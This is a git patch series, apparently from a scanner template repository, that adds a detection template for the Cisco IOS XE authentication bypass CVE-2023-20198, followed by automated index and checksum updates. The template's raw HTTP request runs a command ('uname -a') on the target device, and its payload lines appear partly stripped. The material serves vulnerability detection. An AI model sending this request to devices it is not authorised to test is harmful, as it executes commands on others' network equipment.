From 8e55751c065eb3ba4831b0d7678fb1275c738cd1 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 31 Oct 2023 15:06:09 +0530 Subject: [PATCH 1/7] Added CVE-2023-20198 (Cisco IOS XE - Authentication Bypass) (#8507) * Added CVE-2023-20198 (Cisco IOS XE - Authentication Bypass) * Update CVE-2023-20198.yaml --- http/cves/2023/CVE-2023-20198.yaml | 64 ++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 http/cves/2023/CVE-2023-20198.yaml diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml new file mode 100644 index 0000000000..249d62bb48 --- /dev/null +++ b/http/cves/2023/CVE-2023-20198.yaml @@ -0,0 +1,64 @@ +id: CVE-2023-20198 + +info: + name: Cisco IOS XE - Authentication Bypass + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. + For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory. + Cisco will provide updates on the status of this investigation and when a software patch is available. + reference: + - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/ + - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/ + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z + - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities + - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit + impact: | + The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2023-20198 + epss-score: 0.02284 + epss-percentile: 0.88438 + cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: cisco + product: ios_xe + shodan-query: http.html_hash:1076109428 + note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution. + tags: cve,cve2023,kev,cisco,rce,auth-bypass + +variables: + cmd: uname -a + +http: + - raw: + - |- + POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 + Host: {{Hostname}} + + admin***** {{cmd}} + + matchers: + - type: regex + part: body + regex: + - XMLSchema + - execLog + - Cisco Systems + - + - + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - \n(.*)\[ \ No newline at end of file From 706832c97b3a8ec55906530ef9d133c4f53191ee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 31 Oct 2023 09:36:31 +0000 Subject: [PATCH 2/7] Auto Generated New Template Addition List [Tue Oct 31 09:36:31 UTC 2023] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 09de0302f2..a5504e5d3c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,7 +1,9 @@ +http/cves/2023/CVE-2023-20198.yaml http/default-logins/goip-default-login.yaml http/exposed-panels/cisco/cisco-ios-xe-panel.yaml http/exposed-panels/kiteworks-pcn-panel.yaml http/exposed-panels/overseerr-panel.yaml http/exposed-panels/plausible-panel.yaml http/exposed-panels/truenas-scale-panel.yaml +http/technologies/wordpress/plugins/metform.yaml http/vulnerabilities/other/podcast-generator-ssrf.yaml From ecf98b84d2ff57859023359da1e728b5fdb7f17c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 31 Oct 2023 09:36:36 +0000 Subject: [PATCH 3/7] Auto Generated cves.json [Tue Oct 31 09:36:36 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 37b275bed9..d00ac59558 100644 --- a/cves.json +++ b/cves.json @@ -1971,6 +1971,7 @@ {"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"} {"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"} {"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"} +{"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"} {"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"} {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 6df32ecb8f..13dac0482f 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -66dfa2bf73baea2b9f3865cf5e919966 +689ad4d59d1726734ff631ee854d6092 From 359ea91df8923d78db556c80742195c9bff627b9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 31 Oct 2023 09:36:53 +0000 Subject: [PATCH 4/7] Auto Generated Templates Checksum [Tue Oct 31 09:36:53 UTC 2023] :robot: --- templates-checksum.txt | 3932 ++++++++++++++++++++-------------------- 1 file changed, 1967 insertions(+), 1965 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5ccf0f16ca..e7bcce851a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -371,7 +371,7 @@ helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7d helpers/wordpress/plugins/advanced-custom-fields.txt:da12d3bdce91425575a83cf92ced2c2e796b4046 helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:e4dceaa4c8a3a823472bda4c2278ba6dc96d60f8 +helpers/wordpress/plugins/all-in-one-seo-pack.txt:b32eff3e495130fdc051c1b8a3c184024940b127 helpers/wordpress/plugins/all-in-one-wp-migration.txt:b071da3eacefc38f86d5c19f679acf81979dc01b helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:720901cc15011491c5736a7c66be0da045ae177d helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 @@ -444,7 +444,7 @@ helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:1653860f5bc7d2d43d6254c11488c4469d9db444 helpers/wordpress/plugins/header-footer-elementor.txt:e6657339eaafc90d6f3c5a594663474defe7535f -helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 +helpers/wordpress/plugins/header-footer.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 helpers/wordpress/plugins/host-webfonts-local.txt:57efd6c9af996d49184c10d2eb37abea3ad4614c @@ -524,7 +524,7 @@ helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c helpers/wordpress/plugins/the-events-calendar.txt:a3424440bed2a55822adf277f460788ed75e53f2 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 -helpers/wordpress/plugins/translatepress-multilingual.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 +helpers/wordpress/plugins/translatepress-multilingual.txt:c1c423f2f1813573ad1b704e4b6aea927ed8deb9 helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:35fd2c7ac7c4486ea481738632d2b2188a5e0917 helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d @@ -563,7 +563,7 @@ helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b helpers/wordpress/plugins/wp-reset.txt:299ef94535e5fc122da1afbd80be0ba4f6f99c3e helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:5388cb4970f515020c5073c611a658694b0b5606 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad -helpers/wordpress/plugins/wp-seopress.txt:ec8e800b130e88f8d15b2c092b8d2fd1e5eaa830 +helpers/wordpress/plugins/wp-seopress.txt:7e27230ba01bbc53968feca07aae81d544d0a7c6 helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c helpers/wordpress/plugins/wp-statistics.txt:3b876b7e97baf475486d739676060457743d83c2 @@ -627,1044 +627,1044 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:b360401b724799237fbd4b0b00 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a74d469cb194be475eaea82cfe2dc753efe638fb http/credential-stuffing/self-hosted/grafana-login-check.yaml:8f5793e273b313b8fdc6ef9a28efef7786fe4802 http/credential-stuffing/self-hosted/jira-login-check.yaml:cccab91229b3c826d50f35b9d6b3a52755417602 -http/cves/2000/CVE-2000-0114.yaml:1deeff0542107ada0693d261ce07e0e7d02d5ba6 -http/cves/2001/CVE-2001-0537.yaml:3ac332e49c208e1f330cd2841b88f891f80bab17 -http/cves/2002/CVE-2002-1131.yaml:68e8de53ccddec0230b756219630f23cdd60f44c -http/cves/2004/CVE-2004-0519.yaml:03b754febd40876fc211096316427b29b967846f -http/cves/2004/CVE-2004-1965.yaml:18a8e5f115032b1f887e6c4feb89d65fb669c883 -http/cves/2005/CVE-2005-2428.yaml:d28d5280d1c3cee6eab1c2d7e04740bf4784e80b -http/cves/2005/CVE-2005-3344.yaml:ca7a26999c16adc3e9404cb91c750cc0a6a3c431 -http/cves/2005/CVE-2005-3634.yaml:cbfa88d9ce0f60af79ecacd5d608595445a23c0d -http/cves/2005/CVE-2005-4385.yaml:79d2df23962a0ece90e1f050159a55b1d358ba5e -http/cves/2006/CVE-2006-1681.yaml:ffb5405d7d62e8cd8e621fd16bc0c78a2c6d88c1 -http/cves/2006/CVE-2006-2842.yaml:8d03910d8831fc9b3d1315eb5e1f91e08216f6eb -http/cves/2007/CVE-2007-0885.yaml:4fd1e6dbdc34ad180aded17b506f50d81bb56b39 -http/cves/2007/CVE-2007-4504.yaml:4be161e09435b012b20a8cc25ad4a525d351b344 -http/cves/2007/CVE-2007-4556.yaml:830741b012e7ddfa604b525d9d046f7032e96dbe -http/cves/2007/CVE-2007-5728.yaml:1a5dc5b92bf592aa76bd9d20b88d116dcf9d34a6 -http/cves/2008/CVE-2008-1059.yaml:e129500d8c64533bfafbabfe29a14864f2da8468 -http/cves/2008/CVE-2008-1061.yaml:49dedc2a73b18cc9b8993a8c707d37b8c38e04e6 -http/cves/2008/CVE-2008-1547.yaml:48617d96ace9fdb4b7293a4c6f780a87bb7abe15 +http/cves/2000/CVE-2000-0114.yaml:b2b268dea1b44821f04117a190634be6a7d3e54f +http/cves/2001/CVE-2001-0537.yaml:9b185ce36d76bece6fdba108ea1078f602048568 +http/cves/2002/CVE-2002-1131.yaml:70c796345059f08cbf22634da5021ca48c142ced +http/cves/2004/CVE-2004-0519.yaml:b4ba26120c04e6168b8d68a8a966b295800d9256 +http/cves/2004/CVE-2004-1965.yaml:b135054d1c3832c2879af21ecb4d0013dfb2e68d +http/cves/2005/CVE-2005-2428.yaml:fbfa7a81707ff57bf65df4f2e8f1f454252e63d6 +http/cves/2005/CVE-2005-3344.yaml:0c9b2e126b8ea4f0387012fb892a983533eb5dd6 +http/cves/2005/CVE-2005-3634.yaml:43784f68ed96fa6d9d771acc0687d067c34e6420 +http/cves/2005/CVE-2005-4385.yaml:971704a54990c7b31f8c1ea22a82e492c197d4b8 +http/cves/2006/CVE-2006-1681.yaml:b5bcc85c5bafb58a8aaf3159b4bdae9855f168b0 +http/cves/2006/CVE-2006-2842.yaml:4df9c962e4a2bc0cac1a188aff486dcfe9cdb950 +http/cves/2007/CVE-2007-0885.yaml:a9fc10de406ce9956fbc6371d264c0f1dc2f37c8 +http/cves/2007/CVE-2007-4504.yaml:3d0e609ea38b75d01cabb4e4b4d05e280b6016d4 +http/cves/2007/CVE-2007-4556.yaml:16478161e1a99b1707011282f164fdc2ebc8cc0e +http/cves/2007/CVE-2007-5728.yaml:b4a524f990933ad9142ea1896441901f088a3cfe +http/cves/2008/CVE-2008-1059.yaml:3bb7c737f663779e2a6ee65acc9152134c036f16 +http/cves/2008/CVE-2008-1061.yaml:2b46582517b6e98b329f27a3d186781d8702fc03 +http/cves/2008/CVE-2008-1547.yaml:2849730ead65246b878e804ac0ac48b6f7975991 http/cves/2008/CVE-2008-2398.yaml:eafc0ca2a0452e0e826b878396f65f5bd2598b7c -http/cves/2008/CVE-2008-2650.yaml:3a8217afce0b39235b57bede1aca1f1e74bdce32 -http/cves/2008/CVE-2008-4668.yaml:6332bc77e96560e2a2a22f8b9119c83a2b021c47 +http/cves/2008/CVE-2008-2650.yaml:17c4c38c539c482c48d41ff3168df9bd6d55cb2c +http/cves/2008/CVE-2008-4668.yaml:4683debd63bff721d12bcd6ef74122b990005cfe http/cves/2008/CVE-2008-4764.yaml:1550a840426114dc4783e9352a4c38a1166100d7 -http/cves/2008/CVE-2008-5587.yaml:7edebe3a4bb6b143591142dc08738610e5e1a62b -http/cves/2008/CVE-2008-6080.yaml:db9c4bd60d424dc309fa1427158ed0cc80c5e62a -http/cves/2008/CVE-2008-6172.yaml:b1771fa3bb62c1a0da7cade422b73105ef40b064 -http/cves/2008/CVE-2008-6222.yaml:89401bea9a03b304a52be81aa2a68b5865b9cb12 -http/cves/2008/CVE-2008-6465.yaml:de51a8531ec4202c0f2f4b36c3d139e00d216c60 -http/cves/2008/CVE-2008-6668.yaml:05e273fc582b473ce6bab14d3d0a894991a37d53 -http/cves/2008/CVE-2008-6982.yaml:f99050b1b4b9a79e848a611b30199186210326b1 -http/cves/2008/CVE-2008-7269.yaml:775563779f9025b4698945cdbdc167d68f266ee6 -http/cves/2009/CVE-2009-0347.yaml:9700cf4f3bec5cdb2ad1d17cbd108ed8e793668f +http/cves/2008/CVE-2008-5587.yaml:70c469fd20d43d27198f6d91a0e82e8f1a9409aa +http/cves/2008/CVE-2008-6080.yaml:a338ef847956ad06c34afdf45588bb133a71beb9 +http/cves/2008/CVE-2008-6172.yaml:d8f02d395311bb6dc36091e32ed37b6013affff4 +http/cves/2008/CVE-2008-6222.yaml:014a9a2c17147019ec33e8351e63e5819df8db1b +http/cves/2008/CVE-2008-6465.yaml:62cacdba5bd6ef8755662a1b4026328185721845 +http/cves/2008/CVE-2008-6668.yaml:785122930330bd8e6d03cda3ffda7582645fb551 +http/cves/2008/CVE-2008-6982.yaml:8acba1f31dff5ee04e86cb98f9680670dcffc48e +http/cves/2008/CVE-2008-7269.yaml:d24dc1e5fa4ebc5b9584242942196f983b61d205 +http/cves/2009/CVE-2009-0347.yaml:67605a5cc4915fcea26f3dc8c55a0b5a8c71ca2a http/cves/2009/CVE-2009-0545.yaml:b36aafdb98fad8f1be9221bbb2cb22c5feb4cc8a -http/cves/2009/CVE-2009-0932.yaml:bb8603d549b77decc131b9c4d190643a89b35a8a -http/cves/2009/CVE-2009-1151.yaml:837bd99aeb4e184beed70ce43c1f85aecddbe8b1 -http/cves/2009/CVE-2009-1496.yaml:a5afe18d3e27e273698fc3f7081d47f294b941b6 -http/cves/2009/CVE-2009-1558.yaml:4fb9959c82120542b8ca7130855a1c59d982f363 +http/cves/2009/CVE-2009-0932.yaml:c9d8b06056b1b5d9ddc4bec97b8835b0be96834d +http/cves/2009/CVE-2009-1151.yaml:30fa5c857d09e02501049f57c7095f073d84d4d8 +http/cves/2009/CVE-2009-1496.yaml:961d75a8e7ab023854b4219e5d9efa4710d6d7c4 +http/cves/2009/CVE-2009-1558.yaml:0c8866009e0fdf87ecf6048e6ed2dd4d4e9f18a2 http/cves/2009/CVE-2009-1872.yaml:c0899812143a872474d2f2d6cf2b03c11ece2b91 -http/cves/2009/CVE-2009-2015.yaml:9b5899e6b158dd514aac942e84a8b1eaa3158e35 -http/cves/2009/CVE-2009-2100.yaml:8180a020ad6dc84714956908dd5025e038ddd1b1 -http/cves/2009/CVE-2009-3053.yaml:7e680a4d02f495184f21af77b61015b5d827db5d -http/cves/2009/CVE-2009-3318.yaml:a3a8b43b46138ddd7a5f57909dac2bdffcc4ec0b -http/cves/2009/CVE-2009-4202.yaml:fab78a5bdf86a2f6dacbef26068ab4042ec54e96 -http/cves/2009/CVE-2009-4223.yaml:e5493d115436d40c69ca7340934ee28b5bed9df7 -http/cves/2009/CVE-2009-4679.yaml:660cccd1c21f77adf39ed48326f95ad2461745ea -http/cves/2009/CVE-2009-5020.yaml:c30a41fe323388e5aac477f86f2ef72b37461dce -http/cves/2009/CVE-2009-5114.yaml:70205fbad7cd6869707991f8b1cddc8c431ce548 -http/cves/2010/CVE-2010-0157.yaml:97f8a49e6863aafd265a7e3c5e2cfecaf589ae9e +http/cves/2009/CVE-2009-2015.yaml:b492b43e2ff8fbe71ccedfec407c709bdd849b79 +http/cves/2009/CVE-2009-2100.yaml:e3d0f94b7549f73f0a93eb5ffaf8ac12183d1b10 +http/cves/2009/CVE-2009-3053.yaml:cd790a50fabd00017a925d80fb861e29c6c0bdb0 +http/cves/2009/CVE-2009-3318.yaml:d48476ab96cbdf8506baceb164b25d9e8c67bed7 +http/cves/2009/CVE-2009-4202.yaml:142ea7cb5a6f7b09e712064b1ba849c42f458b3e +http/cves/2009/CVE-2009-4223.yaml:99481debd0ee7ccc72184f3856efc8923974addc +http/cves/2009/CVE-2009-4679.yaml:136ebf7bc89a31866e165970b00ca202a77b833f +http/cves/2009/CVE-2009-5020.yaml:1ff4a72582f587c22f38a33ac7297c8da1c40379 +http/cves/2009/CVE-2009-5114.yaml:9dbcce1d83402640a680a0df8ec8fbb0acae364d +http/cves/2010/CVE-2010-0157.yaml:95abdab118073f5af55f54af86a764c99412e9c1 http/cves/2010/CVE-2010-0219.yaml:54945aacd231f30aff9dd7336ab98442b5490612 -http/cves/2010/CVE-2010-0467.yaml:dba9947b3e0fc23aa3dc03111da763ebeb2a63cd -http/cves/2010/CVE-2010-0696.yaml:8455d45c20a2354ab5cc5d17e1bbe75757e4eabd -http/cves/2010/CVE-2010-0759.yaml:899ca682f0ae735097eba8b68c995fb6cf5144f2 -http/cves/2010/CVE-2010-0942.yaml:21eaeeec2ac7b3a4fb6cd8474c569ba7a8c6b8de -http/cves/2010/CVE-2010-0943.yaml:5b9e61f41107dfc5f699665eee270e44b7552f92 -http/cves/2010/CVE-2010-0944.yaml:a40924ef74c9b5b9eefb0725b178408a56b70743 -http/cves/2010/CVE-2010-0972.yaml:0494e19f37fd4725dd962f0898ff342615b7313f -http/cves/2010/CVE-2010-0982.yaml:0a211ce71049877fbc732aa9c75808bcf6c8eb1d -http/cves/2010/CVE-2010-0985.yaml:2b64e659e15eea58d507e1ba906abc209adcf653 -http/cves/2010/CVE-2010-1056.yaml:de2a0f7d2e558b8889d5738db393052149f3f717 -http/cves/2010/CVE-2010-1081.yaml:deb30c1bb6a76aa58d7355e5cd606449ee77b8ea -http/cves/2010/CVE-2010-1217.yaml:637147ac810c439c2bae6a2513a688b68d0b37ee -http/cves/2010/CVE-2010-1219.yaml:ff58aad5d24df6f14bf76f5bb179f1dc8caa6486 -http/cves/2010/CVE-2010-1302.yaml:e026eeec50c47fc033af56c7a12c9f8dd3754eb2 -http/cves/2010/CVE-2010-1304.yaml:298976e12517243d48fe9aa665d9c4444b652f64 -http/cves/2010/CVE-2010-1305.yaml:8550063d365897a7126fa538c64051b185a035de -http/cves/2010/CVE-2010-1306.yaml:c800b22a1becc306eff650fa30cbbbb6bd007067 -http/cves/2010/CVE-2010-1307.yaml:6e342f817d836c98fde89705dd42cf59bd5a172c -http/cves/2010/CVE-2010-1308.yaml:837f7359d0503a0b9f210fac868ad746c4e96565 -http/cves/2010/CVE-2010-1312.yaml:b85e5618eba8d925d171eafd85eae2cee36daa41 -http/cves/2010/CVE-2010-1313.yaml:e51dcbc87798bd5043897fd1f1cea75153e77fb0 -http/cves/2010/CVE-2010-1314.yaml:0ca73402995be59d8f5cba1aeb363840720a2d28 -http/cves/2010/CVE-2010-1315.yaml:d77592ce730545aa7f27649fa91bc752c551954d -http/cves/2010/CVE-2010-1340.yaml:f7a27768abc6417d7b6d2576d93410007902cc78 -http/cves/2010/CVE-2010-1345.yaml:70d6bb7fe326a58d28298796f258205692d2819e -http/cves/2010/CVE-2010-1352.yaml:0b4932efc5b60d2556071cb6da572d4ae4ceaeae -http/cves/2010/CVE-2010-1353.yaml:f75107a7c85331185fe0e77348e11f6bfd250b7a -http/cves/2010/CVE-2010-1354.yaml:9657a4f317c506304354a80b037d230a0578c141 -http/cves/2010/CVE-2010-1429.yaml:2fa14a92749fa0c92656386fa186f80a1e6852e5 -http/cves/2010/CVE-2010-1461.yaml:3f9078af2317df52df543b8f72dc3841f5f92cf0 -http/cves/2010/CVE-2010-1469.yaml:ba3013f0cc8aab1c0653ebe72ed5f54d4f14913e -http/cves/2010/CVE-2010-1470.yaml:53cabe981890edad053d49ea04c0722dccefc983 -http/cves/2010/CVE-2010-1471.yaml:7d5f0b9a1f6dac628469aac2b1d145af5711b1a1 -http/cves/2010/CVE-2010-1472.yaml:d0621b0726071979cd809392fc54043d01f2ebd6 -http/cves/2010/CVE-2010-1473.yaml:66390eda3d023ff5e4e2a6da2aa762a8d042741c -http/cves/2010/CVE-2010-1474.yaml:8874c2f2034b7cd7ed02ad1ed08f006715bc5b81 -http/cves/2010/CVE-2010-1475.yaml:f4c3f225e1146699924a76607074ef7746e6284e -http/cves/2010/CVE-2010-1476.yaml:358003a59d858da1014b0e0335d5c44c8b81885f -http/cves/2010/CVE-2010-1478.yaml:66ac761ce06b92f56980a1d8cd3127d0262b16f7 -http/cves/2010/CVE-2010-1491.yaml:0f114ed4de067cd5aa3d4f9c81cc3ea8e1e95843 -http/cves/2010/CVE-2010-1494.yaml:addba292be3d08e6b30cf068d453f2dc143aef74 -http/cves/2010/CVE-2010-1495.yaml:87e0d5e7b72a2a4758e6c1feb421dca4cde74705 -http/cves/2010/CVE-2010-1531.yaml:4d85b1e4d318649d28be75b127adeda0c7dd1bc4 -http/cves/2010/CVE-2010-1532.yaml:542ed3307dae3e69897913ddff14145eafb9e2ac -http/cves/2010/CVE-2010-1533.yaml:d1c01b4e564bc88827a1b9aa01ec876363b5cf69 -http/cves/2010/CVE-2010-1534.yaml:fb9dc554c6cbf3ba803a2b7347db83efc9e001aa -http/cves/2010/CVE-2010-1535.yaml:f31a12529d0b9c3164d74eae5ff5669fc82b01f9 -http/cves/2010/CVE-2010-1540.yaml:4c31e3ca7da3baca54de408c221420455dd420d2 -http/cves/2010/CVE-2010-1586.yaml:8a66d4b6c277aa9ffa867a74bb416c5d3779bd97 -http/cves/2010/CVE-2010-1601.yaml:4c7206f5f8eb79407eaf4eafc6d359d418bb87ae -http/cves/2010/CVE-2010-1602.yaml:bfad39b025995e997e48e8c476948be84f4ed07e -http/cves/2010/CVE-2010-1603.yaml:61a7650430b4e96f5806422934223dd18f75caf7 -http/cves/2010/CVE-2010-1607.yaml:06c570192f6b813b56713d046a31dc29bf0a6205 -http/cves/2010/CVE-2010-1653.yaml:03da3458ec166364b8cfe01787982248db70ac49 -http/cves/2010/CVE-2010-1657.yaml:d6e6dca7baba69858b8c29b5cc8929277cc5014c -http/cves/2010/CVE-2010-1658.yaml:4c27f6b679ec607868c468ce56c17072c5aeaad6 -http/cves/2010/CVE-2010-1659.yaml:43c3dae420eba4427cd6b701fda46a5138739c31 -http/cves/2010/CVE-2010-1714.yaml:90fe8933e77c63231374c14c1cfb97c433ed4598 -http/cves/2010/CVE-2010-1715.yaml:c357bab25c3929a27caf9e05dba508e772f28e81 -http/cves/2010/CVE-2010-1717.yaml:c07549aab6e629bd4263e5883733b116b845f6c9 -http/cves/2010/CVE-2010-1718.yaml:ea9b7cc3c4743056b08a4f29fa5e3d3f0b2b6180 -http/cves/2010/CVE-2010-1719.yaml:4bad51a88e5a199555103394e99e93f0372b3e96 -http/cves/2010/CVE-2010-1722.yaml:d7ef3a1c9950cf7df24d53f139eaa0947cf66afe -http/cves/2010/CVE-2010-1723.yaml:9511b61b1436e27fdfb4020433f1be4c9e9f3954 -http/cves/2010/CVE-2010-1858.yaml:7bc5d41fd1a6302bbb75de661c3d517c50b6a845 -http/cves/2010/CVE-2010-1870.yaml:14486537f46b2d46fc841fbea02efa51a781523e -http/cves/2010/CVE-2010-1875.yaml:9308be91c6906e052f489f2c6894ec2282a210e9 -http/cves/2010/CVE-2010-1878.yaml:55ef777e3f71c1aa8257e66c0a2c06cbbae33047 -http/cves/2010/CVE-2010-1952.yaml:ae3ef8cc9a11d573a1ed07b08e44918d3f0d2ad6 -http/cves/2010/CVE-2010-1953.yaml:ffd935e8c57aa1a92db05292c921a4f96b8d2e0a -http/cves/2010/CVE-2010-1954.yaml:c3630ef0affdaa016979a9cd5cbdd2aff3874569 -http/cves/2010/CVE-2010-1955.yaml:49e5e7633e5ec1a20dbda30d8c41fc88de0f5d91 -http/cves/2010/CVE-2010-1956.yaml:27174fef5a42344f698eadf7bb51dcac63bb59b5 -http/cves/2010/CVE-2010-1957.yaml:01f2c0a1d56b0a716e04a0eafa57d03e3d36d5db -http/cves/2010/CVE-2010-1977.yaml:f109837c2db0d492377cd545a32e319ea0cc1878 -http/cves/2010/CVE-2010-1979.yaml:7f1b8849cb2b809d230014c00eced83446fd2b14 +http/cves/2010/CVE-2010-0467.yaml:1ba87f5be32c2a9326c53897af1d028c43034632 +http/cves/2010/CVE-2010-0696.yaml:78d383dd5694587eadcdd061e9861f08c97f35ee +http/cves/2010/CVE-2010-0759.yaml:0721ca1bf197767ae26547055c19f4e794b13fd1 